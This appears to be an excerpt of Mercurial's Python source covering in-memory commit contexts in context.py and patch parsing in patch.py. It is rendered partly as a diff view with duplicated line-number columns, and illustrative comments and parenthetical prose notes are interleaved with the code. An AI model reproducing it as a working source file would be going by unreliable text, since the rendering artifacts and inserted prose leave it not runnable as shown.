            'data': data,
            'date': date,
            'flags': flags,
            'copied': None,
        }

    def filectx(self, path, filelog=None):
        return overlayworkingfilectx(self._repo, path, parent=self,
                                     filelog=filelog)

class overlayworkingfilectx(committablefilectx):
    """Wraps a ``workingfilectx`` but intercepts all writes into an in-memory
    cache, which can be flushed through later by calling ``flush()``."""

    def __init__(self, repo, path, filelog=None, parent=None):
        super(overlayworkingfilectx, self).__init__(repo, path, filelog,
                                                    parent)
        self._repo = repo
        self._parent = parent
        self._path = path

    def cmp(self, fctx):
        return self.data() != fctx.data()

    def changectx(self):
        return self._parent

    def data(self):
        return self._parent.data(self._path)

    def date(self):
        return self._parent.filedate(self._path)

    def exists(self):
        return self.lexists()

    def lexists(self):
        return self._parent.exists(self._path)

    def renamed(self):
        path = self._parent.copydata(self._path)
        if not path:
            return None
        return path, self._changectx._parents[0]._manifest.get(path, nullid)

    def size(self):
        return self._parent.size(self._path)

    def markcopied(self, origin):
        self._parent.markcopied(self._path, origin)

    def audit(self):
        pass

    def flags(self):
        return self._parent.flags(self._path)

    def setflags(self, islink, isexec):
        return self._parent.setflags(self._path, islink, isexec)

    def write(self, data, flags, backgroundclose=False, **kwargs):
        return self._parent.write(self._path, data, flags, **kwargs)

    def remove(self, ignoremissing=False):
        return self._parent.remove(self._path)

    def clearunknown(self):
        pass

class workingcommitctx(workingctx):
    """A workingcommitctx object makes access to data related to
    the revision being committed convenient.

    This hides changes in the working directory, if they aren't
    committed in this context.
    """
    def __init__(self, repo, changes,
                 text="", user=None, date=None, extra=None):
        super(workingctx, self).__init__(repo, text, user, date, extra,
                                         changes)

    def _dirstatestatus(self, match, ignored=False, clean=False, unknown=False):
        """Return matched files only in ``self._status``

        Uncommitted files appear "clean" via this context, even if
        they aren't actually so in the working directory.
        """
        if clean:
            clean = [f for f in self._manifest if f not in self._changedset]
        else:
            clean = []
        return scmutil.status([f for f in self._status.modified if match(f)],
                              [f for f in self._status.added if match(f)],
                              [f for f in self._status.removed if match(f)],
                              [], [], [], clean)

    @propertycache
    def _changedset(self):
        """Return the set of files changed in this context
        """
        changed = set(self._status.modified)
        changed.update(self._status.added)
        changed.update(self._status.removed)
        return changed

def makecachingfilectxfn(func):
    """Create a filectxfn that caches based on the path.

    We can't use util.cachefunc because it uses all arguments as the cache
    key and this creates a cycle since the arguments include the repo and
    memctx.
    """
    cache = {}

    def getfilectx(repo, memctx, path):
        if path not in cache:
            cache[path] = func(repo, memctx, path)
        return cache[path]

    return getfilectx

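# A hedged, runnable toy of the memoization above (names hypothetical): the
# loader runs once per path no matter how often the path is requested, and
# the repo/memctx arguments never become cache keys, avoiding the cycle the
# docstring describes.
def _democachingfilectxfn():
    calls = []
    def loader(repo, memctx, path):
        calls.append(path)
        return 'fctx-for-%s' % path
    cached = makecachingfilectxfn(loader)
    cached(None, None, 'a')
    cached(None, None, 'a')   # second call served from the path-keyed cache
    assert calls == ['a']
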
def memfilefromctx(ctx):
    """Given a context return a memfilectx for ctx[path]

    This is a convenience method for building a memctx based on another
    context.
    """
    def getfilectx(repo, memctx, path):
        fctx = ctx[path]
        # this is weird but apparently we only keep track of one parent
        # (why not only store that instead of a tuple?)
        copied = fctx.renamed()
        if copied:
            copied = copied[0]
        return memfilectx(repo, memctx, path, fctx.data(),
                          islink=fctx.islink(), isexec=fctx.isexec(),
                          copied=copied)

    return getfilectx

def memfilefrompatch(patchstore):
    """Given a patch (e.g. patchstore object) return a memfilectx

    This is a convenience method for building a memctx based on a patchstore.
    """
    def getfilectx(repo, memctx, path):
        data, mode, copied = patchstore.getfile(path)
        if data is None:
            return None
        islink, isexec = mode
        return memfilectx(repo, memctx, path, data, islink=islink,
                          isexec=isexec, copied=copied)

    return getfilectx

class memctx(committablectx):
    """Use memctx to perform in-memory commits via localrepo.commitctx().

    Revision information is supplied at initialization time, while
    related files data is made available through a callback
    mechanism. 'repo' is the current localrepo, 'parents' is a
    sequence of two parent revisions identifiers (pass None for every
    missing parent), 'text' is the commit message and 'files' lists
    names of files touched by the revision (normalized and relative to
    repository root).

    filectxfn(repo, memctx, path) is a callable receiving the
    repository, the current memctx object and the normalized path of
    requested file, relative to repository root. It is fired by the
    commit function for every file in 'files', but calls order is
    undefined. If the file is available in the revision being
    committed (updated or added), filectxfn returns a memfilectx
    object. If the file was removed, filectxfn returns None for recent
    Mercurial. Moved files are represented by marking the source file
    removed and the new file added with copy information (see
    memfilectx).

    user receives the committer name and defaults to current
    repository username, date is the commit date in any format
    supported by dateutil.parsedate() and defaults to current date, extra
    is a dictionary of metadata or is left empty.
    """

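    # A hedged usage sketch (repository and file names hypothetical): commit
    # one new file and delete another without touching the working directory,
    # by answering the filectxfn callback per path:
    #
    #     def filectxfn(repo, mctx, path):
    #         if path == 'deleted.txt':
    #             return None          # registers a deletion
    #         return memfilectx(repo, mctx, path, 'contents\n')
    #
    #     ctx = memctx(repo, (repo['.'].node(), None), 'commit message',
    #                  ['new.txt', 'deleted.txt'], filectxfn, user='someone')
    #     node = ctx.commit()
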
    # Mercurial <= 3.1 expects the filectxfn to raise IOError for missing files.
    # Extensions that need to retain compatibility across Mercurial 3.1 can use
    # this field to determine what to do in filectxfn.
    _returnnoneformissingfiles = True

    def __init__(self, repo, parents, text, files, filectxfn, user=None,
                 date=None, extra=None, branch=None, editor=False):
        super(memctx, self).__init__(repo, text, user, date, extra)
        self._rev = None
        self._node = None
        parents = [(p or nullid) for p in parents]
        p1, p2 = parents
        self._parents = [self._repo[p] for p in (p1, p2)]
        files = sorted(set(files))
        self._files = files
        if branch is not None:
            self._extra['branch'] = encoding.fromlocal(branch)
        self.substate = {}

        if isinstance(filectxfn, patch.filestore):
            filectxfn = memfilefrompatch(filectxfn)
        elif not callable(filectxfn):
            # if store is not callable, wrap it in a function
            filectxfn = memfilefromctx(filectxfn)

        # memoizing increases performance for e.g. vcs convert scenarios.
        self._filectxfn = makecachingfilectxfn(filectxfn)

        if editor:
            self._text = editor(self._repo, self, [])
            self._repo.savecommitmessage(self._text)

2232
2234
2233 def filectx(self, path, filelog=None):
2235 def filectx(self, path, filelog=None):
2234 """get a file context from the working directory
2236 """get a file context from the working directory
2235
2237
2236 Returns None if file doesn't exist and should be removed."""
2238 Returns None if file doesn't exist and should be removed."""
2237 return self._filectxfn(self._repo, self, path)
2239 return self._filectxfn(self._repo, self, path)
2238
2240
2239 def commit(self):
2241 def commit(self):
2240 """commit context to the repo"""
2242 """commit context to the repo"""
2241 return self._repo.commitctx(self)
2243 return self._repo.commitctx(self)
2242
2244
2243 @propertycache
2245 @propertycache
2244 def _manifest(self):
2246 def _manifest(self):
2245 """generate a manifest based on the return values of filectxfn"""
2247 """generate a manifest based on the return values of filectxfn"""
2246
2248
2247 # keep this simple for now; just worry about p1
2249 # keep this simple for now; just worry about p1
2248 pctx = self._parents[0]
2250 pctx = self._parents[0]
2249 man = pctx.manifest().copy()
2251 man = pctx.manifest().copy()
2250
2252
2251 for f in self._status.modified:
2253 for f in self._status.modified:
2252 p1node = nullid
2254 p1node = nullid
2253 p2node = nullid
2255 p2node = nullid
2254 p = pctx[f].parents() # if file isn't in pctx, check p2?
2256 p = pctx[f].parents() # if file isn't in pctx, check p2?
2255 if len(p) > 0:
2257 if len(p) > 0:
2256 p1node = p[0].filenode()
2258 p1node = p[0].filenode()
2257 if len(p) > 1:
2259 if len(p) > 1:
2258 p2node = p[1].filenode()
2260 p2node = p[1].filenode()
2259 man[f] = revlog.hash(self[f].data(), p1node, p2node)
2261 man[f] = revlog.hash(self[f].data(), p1node, p2node)
2260
2262
2261 for f in self._status.added:
2263 for f in self._status.added:
2262 man[f] = revlog.hash(self[f].data(), nullid, nullid)
2264 man[f] = revlog.hash(self[f].data(), nullid, nullid)
2263
2265
2264 for f in self._status.removed:
2266 for f in self._status.removed:
2265 if f in man:
2267 if f in man:
2266 del man[f]
2268 del man[f]
2267
2269
2268 return man
2270 return man
2269
2271
2270 @propertycache
2272 @propertycache
2271 def _status(self):
2273 def _status(self):
2272 """Calculate exact status from ``files`` specified at construction
2274 """Calculate exact status from ``files`` specified at construction
2273 """
2275 """
2274 man1 = self.p1().manifest()
2276 man1 = self.p1().manifest()
2275 p2 = self._parents[1]
2277 p2 = self._parents[1]
2276 # "1 < len(self._parents)" can't be used for checking
2278 # "1 < len(self._parents)" can't be used for checking
2277 # existence of the 2nd parent, because "memctx._parents" is
2279 # existence of the 2nd parent, because "memctx._parents" is
2278 # explicitly initialized by the list, of which length is 2.
2280 # explicitly initialized by the list, of which length is 2.
2279 if p2.node() != nullid:
2281 if p2.node() != nullid:
2280 man2 = p2.manifest()
2282 man2 = p2.manifest()
2281 managing = lambda f: f in man1 or f in man2
2283 managing = lambda f: f in man1 or f in man2
2282 else:
2284 else:
2283 managing = lambda f: f in man1
2285 managing = lambda f: f in man1
2284
2286
2285 modified, added, removed = [], [], []
2287 modified, added, removed = [], [], []
2286 for f in self._files:
2288 for f in self._files:
2287 if not managing(f):
2289 if not managing(f):
2288 added.append(f)
2290 added.append(f)
2289 elif self[f]:
2291 elif self[f]:
2290 modified.append(f)
2292 modified.append(f)
2291 else:
2293 else:
2292 removed.append(f)
2294 removed.append(f)
2293
2295
2294 return scmutil.status(modified, added, removed, [], [], [], [])
2296 return scmutil.status(modified, added, removed, [], [], [], [])
2295
2297
class memfilectx(committablefilectx):
    """memfilectx represents an in-memory file to commit.

    See memctx and committablefilectx for more details.
    """
    def __init__(self, repo, changectx, path, data, islink=False,
                 isexec=False, copied=None):
        """
        path is the normalized file path relative to repository root.
        data is the file content as a string.
        islink is True if the file is a symbolic link.
        isexec is True if the file is executable.
        copied is the source file path if current file was copied in the
        revision being committed, or None."""
        super(memfilectx, self).__init__(repo, path, None, changectx)
        self._data = data
        self._flags = (islink and 'l' or '') + (isexec and 'x' or '')
        self._copied = None
        if copied:
            self._copied = (copied, nullid)

    def data(self):
        return self._data

    def remove(self, ignoremissing=False):
        """wraps unlink for a repo's working directory"""
        # need to figure out what to do here
        del self._changectx[self._path]

    def write(self, data, flags, **kwargs):
        """wraps repo.wwrite"""
        self._data = data

class overlayfilectx(committablefilectx):
    """Like memfilectx but takes an original filectx and optional parameters
    to override parts of it. This is useful when fctx.data() is expensive
    (i.e. flag processor is expensive) and raw data, flags, and filenode could
    be reused (ex. rebase or mode-only amend a REVIDX_EXTSTORED file).
    """

    def __init__(self, originalfctx, datafunc=None, path=None, flags=None,
                 copied=None, ctx=None):
        """originalfctx: filecontext to duplicate

        datafunc: None or a function to override data (file content). It is a
        function so the data can be computed lazily. path, flags, copied, ctx:
        None or overridden value

        copied could be (path, rev), or False. copied could also be just path,
        and will be converted to (path, nullid). This simplifies some callers.
        """

        if path is None:
            path = originalfctx.path()
        if ctx is None:
            ctx = originalfctx.changectx()
            ctxmatch = lambda: True
        else:
            ctxmatch = lambda: ctx == originalfctx.changectx()

        repo = originalfctx.repo()
        flog = originalfctx.filelog()
        super(overlayfilectx, self).__init__(repo, path, flog, ctx)

        if copied is None:
            copied = originalfctx.renamed()
            copiedmatch = lambda: True
        else:
            if copied and not isinstance(copied, tuple):
                # repo._filecommit will recalculate copyrev so nullid is okay
                copied = (copied, nullid)
            copiedmatch = lambda: copied == originalfctx.renamed()

        # When data, copied (could affect data), ctx (could affect filelog
        # parents) are not overridden, rawdata, rawflags, and filenode may be
        # reused (repo._filecommit should double check filelog parents).
        #
        # path, flags are not hashed in filelog (but in manifestlog) so they do
        # not affect reusable here.
        #
        # If ctx or copied is overridden to the same value as originalfctx,
        # still consider it reusable. originalfctx.renamed() may be a bit
        # expensive so it's not called unless necessary. Assuming datafunc is
        # always expensive, do not call it for this "reusable" test.
        reusable = datafunc is None and ctxmatch() and copiedmatch()

        if datafunc is None:
            datafunc = originalfctx.data
        if flags is None:
            flags = originalfctx.flags()

        self._datafunc = datafunc
        self._flags = flags
        self._copied = copied

        if reusable:
            # copy extra fields from originalfctx
            attrs = ['rawdata', 'rawflags', '_filenode', '_filerev']
            for attr_ in attrs:
                if util.safehasattr(originalfctx, attr_):
                    setattr(self, attr_, getattr(originalfctx, attr_))

    def data(self):
        return self._datafunc()

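    # A hedged sketch of the intended use (variables hypothetical): wrap an
    # existing filectx, overriding only selected parts; when neither data,
    # ctx nor copied is overridden, the cached raw fields are carried over:
    #
    #     fctx = ctx['big-file.bin']
    #     samefctx = overlayfilectx(fctx)                  # fully reusable
    #     renamed = overlayfilectx(fctx, copied='old.bin') # override copy src
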
class metadataonlyctx(committablectx):
    """Like memctx but it reuses the manifest of a different commit.
    Intended to be used by lightweight operations that are creating
    metadata-only changes.

    Revision information is supplied at initialization time. 'repo' is the
    current localrepo, 'ctx' is the original revision whose manifest we're
    reusing, 'parents' is a sequence of two parent revisions identifiers (pass
    None for every missing parent), 'text' is the commit message.

    user receives the committer name and defaults to current repository
    username, date is the commit date in any format supported by
    dateutil.parsedate() and defaults to current date, extra is a dictionary of
    metadata or is left empty.
    """
    def __init__(self, repo, originalctx, parents=None, text=None, user=None,
                 date=None, extra=None, editor=False):
        if text is None:
            text = originalctx.description()
        super(metadataonlyctx, self).__init__(repo, text, user, date, extra)
        self._rev = None
        self._node = None
        self._originalctx = originalctx
        self._manifestnode = originalctx.manifestnode()
        if parents is None:
            parents = originalctx.parents()
        else:
            parents = [repo[p] for p in parents if p is not None]
        parents = parents[:]
        while len(parents) < 2:
            parents.append(repo[nullid])
        p1, p2 = self._parents = parents

        # sanity check to ensure that the reused manifest parents are
        # manifests of our commit parents
        mp1, mp2 = self.manifestctx().parents
        if p1 != nullid and p1.manifestnode() != mp1:
            raise RuntimeError('can\'t reuse the manifest: '
                               'its p1 doesn\'t match the new ctx p1')
        if p2 != nullid and p2.manifestnode() != mp2:
            raise RuntimeError('can\'t reuse the manifest: '
                               'its p2 doesn\'t match the new ctx p2')

        self._files = originalctx.files()
        self.substate = {}

        if editor:
            self._text = editor(self._repo, self, [])
            self._repo.savecommitmessage(self._text)

    def manifestnode(self):
        return self._manifestnode

    @property
    def _manifestctx(self):
        return self._repo.manifestlog[self._manifestnode]

    def filectx(self, path, filelog=None):
        return self._originalctx.filectx(path, filelog=filelog)

    def commit(self):
        """commit context to the repo"""
        return self._repo.commitctx(self)

    @property
    def _manifest(self):
        return self._originalctx.manifest()

    @propertycache
    def _status(self):
        """Calculate exact status from ``files`` specified in the ``origctx``
        and parents manifests.
        """
        man1 = self.p1().manifest()
        p2 = self._parents[1]
        # "1 < len(self._parents)" can't be used for checking
        # existence of the 2nd parent, because "metadataonlyctx._parents" is
        # explicitly initialized as a list of length 2.
        if p2.node() != nullid:
            man2 = p2.manifest()
            managing = lambda f: f in man1 or f in man2
        else:
            managing = lambda f: f in man1

        modified, added, removed = [], [], []
        for f in self._files:
            if not managing(f):
                added.append(f)
            elif f in self:
                modified.append(f)
            else:
                removed.append(f)

        return scmutil.status(modified, added, removed, [], [], [], [])

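# A hedged sketch (helper name and driver code hypothetical) of the kind of
# metadata-only rewrite this class enables: amend just the commit message
# while reusing the original manifest wholesale, so no file is re-stored.
def _rewordsketch(repo, rev, newtext):
    newctx = metadataonlyctx(repo, repo[rev], text=newtext)
    return newctx.commit()
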
class arbitraryfilectx(object):
    """Allows you to use filectx-like functions on a file in an arbitrary
    location on disk, possibly not in the working directory.
    """
    def __init__(self, path, repo=None):
        # Repo is optional because contrib/simplemerge uses this class.
        self._repo = repo
        self._path = path

    def cmp(self, fctx):
        # filecmp follows symlinks whereas `cmp` should not, so skip the fast
        # path if either side is a symlink.
        symlinks = ('l' in self.flags() or 'l' in fctx.flags())
        if not symlinks and isinstance(fctx, workingfilectx) and self._repo:
            # Add a fast-path for merge if both sides are disk-backed.
            # Note that filecmp uses the opposite return values (True if same)
            # from our cmp functions (True if different).
            return not filecmp.cmp(self.path(), self._repo.wjoin(fctx.path()))
        return self.data() != fctx.data()

    def path(self):
        return self._path

    def flags(self):
        return ''

    def data(self):
        return util.readfile(self._path)

    def decodeddata(self):
        with open(self._path, "rb") as f:
            return f.read()

    def remove(self):
        util.unlink(self._path)

    def write(self, data, flags, **kwargs):
        assert not flags
        with open(self._path, "w") as f:
            f.write(data)
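
# A hedged example of the class above (paths supplied by the caller),
# following this module's cmp() convention where True means "different".
def _comparefilessketch(left, right):
    lctx = arbitraryfilectx(left)
    rctx = arbitraryfilectx(right)
    return lctx.cmp(rctx)   # True when the on-disk contents differ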
@@ -1,2950 +1,2951 b''
# patch.py - patch file parsing routines
#
# Copyright 2006 Brendan Cully <brendan@kublai.com>
# Copyright 2007 Chris Mason <chris.mason@oracle.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import absolute_import, print_function

import collections
import contextlib
import copy
import email
import errno
import hashlib
import os
import posixpath
import re
import shutil
import zlib

from .i18n import _
from .node import (
    hex,
    short,
)
from . import (
    copies,
    diffhelper,
    encoding,
    error,
    mail,
    mdiff,
    pathutil,
    pycompat,
    scmutil,
    similar,
    util,
    vfs as vfsmod,
)
from .utils import (
    dateutil,
    procutil,
    stringutil,
)

stringio = util.stringio

gitre = re.compile(br'diff --git a/(.*) b/(.*)')
tabsplitter = re.compile(br'(\t+|[^\t]+)')
wordsplitter = re.compile(br'(\t+| +|[a-zA-Z0-9_\x80-\xff]+|'
                          b'[^ \ta-zA-Z0-9_\x80-\xff])')

PatchError = error.PatchError

# public functions

def split(stream):
    '''return an iterator of individual patches from a stream'''
    def isheader(line, inheader):
        if inheader and line.startswith((' ', '\t')):
            # continuation
            return True
        if line.startswith((' ', '-', '+')):
            # diff line - don't check for header pattern in there
            return False
        l = line.split(': ', 1)
        return len(l) == 2 and ' ' not in l[0]

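    # How isheader classifies lines (illustrative): an RFC-2822-style
    # "Key: value" line starts a header, an indented line continues one only
    # while already inside a header, and diff-body lines are never headers:
    #
    #     isheader('Subject: [PATCH] fix', False)  # -> True
    #     isheader('\tcontinued subject', True)    # -> True
    #     isheader('+added line', True)            # -> False
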
    def chunk(lines):
        return stringio(''.join(lines))

    def hgsplit(stream, cur):
        inheader = True

        for line in stream:
            if not line.strip():
                inheader = False
            if not inheader and line.startswith('# HG changeset patch'):
                yield chunk(cur)
                cur = []
                inheader = True

            cur.append(line)

        if cur:
            yield chunk(cur)

    def mboxsplit(stream, cur):
        for line in stream:
            if line.startswith('From '):
                for c in split(chunk(cur[1:])):
                    yield c
                cur = []

            cur.append(line)

        if cur:
            for c in split(chunk(cur[1:])):
                yield c

    def mimesplit(stream, cur):
        def msgfp(m):
            fp = stringio()
            g = email.Generator.Generator(fp, mangle_from_=False)
            g.flatten(m)
            fp.seek(0)
            return fp

        for line in stream:
            cur.append(line)
        c = chunk(cur)

        m = mail.parse(c)
        if not m.is_multipart():
            yield msgfp(m)
        else:
            ok_types = ('text/plain', 'text/x-diff', 'text/x-patch')
            for part in m.walk():
                ct = part.get_content_type()
                if ct not in ok_types:
                    continue
                yield msgfp(part)

    def headersplit(stream, cur):
        inheader = False

        for line in stream:
            if not inheader and isheader(line, inheader):
                yield chunk(cur)
                cur = []
                inheader = True
            if inheader and not isheader(line, inheader):
                inheader = False

            cur.append(line)

        if cur:
            yield chunk(cur)

    def remainder(cur):
        yield chunk(cur)

    class fiter(object):
        def __init__(self, fp):
            self.fp = fp

        def __iter__(self):
            return self

        def next(self):
            l = self.fp.readline()
            if not l:
                raise StopIteration
            return l

        __next__ = next

    inheader = False
    cur = []

    mimeheaders = ['content-type']

    if not util.safehasattr(stream, 'next'):
        # http responses, for example, have readline but not next
        stream = fiter(stream)

    for line in stream:
        cur.append(line)
        if line.startswith('# HG changeset patch'):
            return hgsplit(stream, cur)
        elif line.startswith('From '):
            return mboxsplit(stream, cur)
        elif isheader(line, inheader):
176 inheader = True
176 inheader = True
177 if line.split(':', 1)[0].lower() in mimeheaders:
177 if line.split(':', 1)[0].lower() in mimeheaders:
178 # let email parser handle this
178 # let email parser handle this
179 return mimesplit(stream, cur)
179 return mimesplit(stream, cur)
180 elif line.startswith('--- ') and inheader:
180 elif line.startswith('--- ') and inheader:
181 # No evil headers seen by diff start, split by hand
181 # No evil headers seen by diff start, split by hand
182 return headersplit(stream, cur)
182 return headersplit(stream, cur)
183 # Not enough info, keep reading
183 # Not enough info, keep reading
184
184
185 # if we are here, we have a very plain patch
185 # if we are here, we have a very plain patch
186 return remainder(cur)
186 return remainder(cur)
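(A rough usage sketch, not part of the module: the blob content is hypothetical and `process` is a placeholder consumer. Each chunk yielded by split() is a file-like object holding one patch.)

    blob = stringio('# HG changeset patch\n# User a\n\ndiff ...\n'
                    '# HG changeset patch\n# User b\n\ndiff ...\n')
    for patchfp in split(blob):
        process(patchfp.read())  # placeholder consumer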
187
188 ## Some facility for extensible patch parsing:
189 # list of pairs ("header to match", "data key")
190 patchheadermap = [('Date', 'date'),
191                   ('Branch', 'branch'),
192                   ('Node ID', 'nodeid'),
193                  ]
194
195 @contextlib.contextmanager
196 def extract(ui, fileobj):
197     '''extract patch from data read from fileobj.
198
199     patch can be a normal patch or contained in an email message.
200
201     return a dictionary. Standard keys are:
202       - filename,
203       - message,
204       - user,
205       - date,
206       - branch,
207       - node,
208       - p1,
209       - p2.
210     Any item can be missing from the dictionary. If filename is missing,
211     fileobj did not contain a patch. The temporary file is unlinked when
        the context manager exits.'''
212
213     fd, tmpname = pycompat.mkstemp(prefix='hg-patch-')
214     tmpfp = os.fdopen(fd, r'wb')
215     try:
216         yield _extract(ui, fileobj, tmpname, tmpfp)
217     finally:
218         tmpfp.close()
219         os.unlink(tmpname)
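(A sketch of the caller side, assuming a `ui` and an open `fileobj`: because extract() is a context manager, the temporary patch file named by data['filename'] is only valid inside the with block.)

    with extract(ui, fileobj) as data:
        if 'filename' in data:       # a diff was detected
            ui.write(data['message'])
            # consume data['filename'] here, before the context exits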
220
221 def _extract(ui, fileobj, tmpname, tmpfp):
222
223     # attempt to detect the start of a patch
224     # (this heuristic is borrowed from quilt)
225     diffre = re.compile(br'^(?:Index:[ \t]|diff[ \t]-|RCS file: |'
226                         br'retrieving revision [0-9]+(\.[0-9]+)*$|'
227                         br'---[ \t].*?^\+\+\+[ \t]|'
228                         br'\*\*\*[ \t].*?^---[ \t])',
229                         re.MULTILINE | re.DOTALL)
230
231     data = {}
232
233     msg = mail.parse(fileobj)
234
235     subject = msg[r'Subject'] and mail.headdecode(msg[r'Subject'])
236     data['user'] = msg[r'From'] and mail.headdecode(msg[r'From'])
237     if not subject and not data['user']:
238         # Not an email, restore parsed headers if any
239         subject = '\n'.join(': '.join(map(encoding.strtolocal, h))
240                             for h in msg.items()) + '\n'
241
242     # should try to parse msg['Date']
243     parents = []
244
245     if subject:
246         if subject.startswith('[PATCH'):
247             pend = subject.find(']')
248             if pend >= 0:
249                 subject = subject[pend + 1:].lstrip()
250         subject = re.sub(br'\n[ \t]+', ' ', subject)
251         ui.debug('Subject: %s\n' % subject)
252     if data['user']:
253         ui.debug('From: %s\n' % data['user'])
254     diffs_seen = 0
255     ok_types = ('text/plain', 'text/x-diff', 'text/x-patch')
256     message = ''
257     for part in msg.walk():
258         content_type = pycompat.bytestr(part.get_content_type())
259         ui.debug('Content-Type: %s\n' % content_type)
260         if content_type not in ok_types:
261             continue
262         payload = part.get_payload(decode=True)
263         m = diffre.search(payload)
264         if m:
265             hgpatch = False
266             hgpatchheader = False
267             ignoretext = False
268
269             ui.debug('found patch at byte %d\n' % m.start(0))
270             diffs_seen += 1
271             cfp = stringio()
272             for line in payload[:m.start(0)].splitlines():
273                 if line.startswith('# HG changeset patch') and not hgpatch:
274                     ui.debug('patch generated by hg export\n')
275                     hgpatch = True
276                     hgpatchheader = True
277                     # drop earlier commit message content
278                     cfp.seek(0)
279                     cfp.truncate()
280                     subject = None
281                 elif hgpatchheader:
282                     if line.startswith('# User '):
283                         data['user'] = line[7:]
284                         ui.debug('From: %s\n' % data['user'])
285                     elif line.startswith("# Parent "):
286                         parents.append(line[9:].lstrip())
287                     elif line.startswith("# "):
288                         for header, key in patchheadermap:
289                             prefix = '# %s ' % header
290                             if line.startswith(prefix):
291                                 data[key] = line[len(prefix):]
292                     else:
293                         hgpatchheader = False
294                 elif line == '---':
295                     ignoretext = True
296                 if not hgpatchheader and not ignoretext:
297                     cfp.write(line)
298                     cfp.write('\n')
299             message = cfp.getvalue()
300             if tmpfp:
301                 tmpfp.write(payload)
302                 if not payload.endswith('\n'):
303                     tmpfp.write('\n')
304         elif not diffs_seen and message and content_type == 'text/plain':
305             message += '\n' + payload
306
307     if subject and not message.startswith(subject):
308         message = '%s\n%s' % (subject, message)
309     data['message'] = message
310     tmpfp.close()
311     if parents:
312         data['p1'] = parents.pop(0)
313         if parents:
314             data['p2'] = parents.pop(0)
315
316     if diffs_seen:
317         data['filename'] = tmpname
318
319     return data
320
321 class patchmeta(object):
322     """Patched file metadata
323
324     'op' is the performed operation within ADD, DELETE, RENAME, MODIFY
325     or COPY. 'path' is patched file path. 'oldpath' is set to the
326     origin file when 'op' is either COPY or RENAME, None otherwise. If
327     file mode is changed, 'mode' is a tuple (islink, isexec) where
328     'islink' is True if the file is a symlink and 'isexec' is True if
329     the file is executable. Otherwise, 'mode' is None.
330     """
331     def __init__(self, path):
332         self.path = path
333         self.oldpath = None
334         self.mode = None
335         self.op = 'MODIFY'
336         self.binary = False
337
338     def setmode(self, mode):
339         islink = mode & 0o20000
340         isexec = mode & 0o100
341         self.mode = (islink, isexec)
342
343     def copy(self):
344         other = patchmeta(self.path)
345         other.oldpath = self.oldpath
346         other.mode = self.mode
347         other.op = self.op
348         other.binary = self.binary
349         return other
350
351     def _ispatchinga(self, afile):
352         if afile == '/dev/null':
353             return self.op == 'ADD'
354         return afile == 'a/' + (self.oldpath or self.path)
355
356     def _ispatchingb(self, bfile):
357         if bfile == '/dev/null':
358             return self.op == 'DELETE'
359         return bfile == 'b/' + self.path
360
361     def ispatching(self, afile, bfile):
362         return self._ispatchinga(afile) and self._ispatchingb(bfile)
363
364     def __repr__(self):
365         return "<patchmeta %s %r>" % (self.op, self.path)
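(For illustration, a hand-built sketch rather than output from a real parse: the metadata for a rename would look like this, matching the _ispatchinga/_ispatchingb checks above.)

    gp = patchmeta('new.txt')
    gp.op = 'RENAME'
    gp.oldpath = 'old.txt'
    # matches the 'a/old.txt' -> 'b/new.txt' pair of a git-style diff
    assert gp.ispatching('a/old.txt', 'b/new.txt')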
366
367 def readgitpatch(lr):
368     """extract git-style metadata about patches from <patchname>"""
369
370     # Filter patch for git information
371     gp = None
372     gitpatches = []
373     for line in lr:
374         line = line.rstrip(' \r\n')
375         if line.startswith('diff --git a/'):
376             m = gitre.match(line)
377             if m:
378                 if gp:
379                     gitpatches.append(gp)
380                 dst = m.group(2)
381                 gp = patchmeta(dst)
382         elif gp:
383             if line.startswith('--- '):
384                 gitpatches.append(gp)
385                 gp = None
386                 continue
387             if line.startswith('rename from '):
388                 gp.op = 'RENAME'
389                 gp.oldpath = line[12:]
390             elif line.startswith('rename to '):
391                 gp.path = line[10:]
392             elif line.startswith('copy from '):
393                 gp.op = 'COPY'
394                 gp.oldpath = line[10:]
395             elif line.startswith('copy to '):
396                 gp.path = line[8:]
397             elif line.startswith('deleted file'):
398                 gp.op = 'DELETE'
399             elif line.startswith('new file mode '):
400                 gp.op = 'ADD'
401                 gp.setmode(int(line[-6:], 8))
402             elif line.startswith('new mode '):
403                 gp.setmode(int(line[-6:], 8))
404             elif line.startswith('GIT binary patch'):
405                 gp.binary = True
406     if gp:
407         gitpatches.append(gp)
408
409     return gitpatches
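(A sketch of what readgitpatch() extracts from a minimal hand-written git-style diff; linereader is defined just below, and stringio comes from the top of the module.)

    text = ('diff --git a/foo b/bar\n'
            'rename from foo\n'
            'rename to bar\n')
    [gp] = readgitpatch(linereader(stringio(text)))
    # gp.op == 'RENAME', gp.oldpath == 'foo', gp.path == 'bar'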
410
411 class linereader(object):
412     # simple class to allow pushing lines back into the input stream
413     def __init__(self, fp):
414         self.fp = fp
415         self.buf = []
416
417     def push(self, line):
418         if line is not None:
419             self.buf.append(line)
420
421     def readline(self):
422         if self.buf:
423             l = self.buf[0]
424             del self.buf[0]
425             return l
426         return self.fp.readline()
427
428     def __iter__(self):
429         return iter(self.readline, '')
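(The push-back buffer lets a parser peek at a line and then un-read it; a sketch:)

    lr = linereader(stringio('first\nsecond\n'))
    line = lr.readline()   # 'first\n'
    lr.push(line)          # put it back
    lr.readline()          # 'first\n' again: buffered lines are re-read first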
430
431 class abstractbackend(object):
432     def __init__(self, ui):
433         self.ui = ui
434
435     def getfile(self, fname):
436         """Return target file data and flags as a (data, (islink,
437         isexec)) tuple. Data is None if file is missing/deleted.
438         """
439         raise NotImplementedError
440
441     def setfile(self, fname, data, mode, copysource):
442         """Write data to target file fname and set its mode. mode is a
443         (islink, isexec) tuple. If data is None, the file content should
444         be left unchanged. If the file is modified after being copied,
445         copysource is set to the original file name.
446         """
447         raise NotImplementedError
448
449     def unlink(self, fname):
450         """Unlink target file."""
451         raise NotImplementedError
452
453     def writerej(self, fname, failed, total, lines):
454         """Write rejected lines for fname. failed is the number of hunks
455         which failed to apply and total is the total number of hunks for
456         this file.
457         """
458
459     def exists(self, fname):
460         raise NotImplementedError
461
462     def close(self):
463         raise NotImplementedError
464
465 class fsbackend(abstractbackend):
466     def __init__(self, ui, basedir):
467         super(fsbackend, self).__init__(ui)
468         self.opener = vfsmod.vfs(basedir)
469
470     def getfile(self, fname):
471         if self.opener.islink(fname):
472             return (self.opener.readlink(fname), (True, False))
473
474         isexec = False
475         try:
476             isexec = self.opener.lstat(fname).st_mode & 0o100 != 0
477         except OSError as e:
478             if e.errno != errno.ENOENT:
479                 raise
480         try:
481             return (self.opener.read(fname), (False, isexec))
482         except IOError as e:
483             if e.errno != errno.ENOENT:
484                 raise
485             return None, None
486
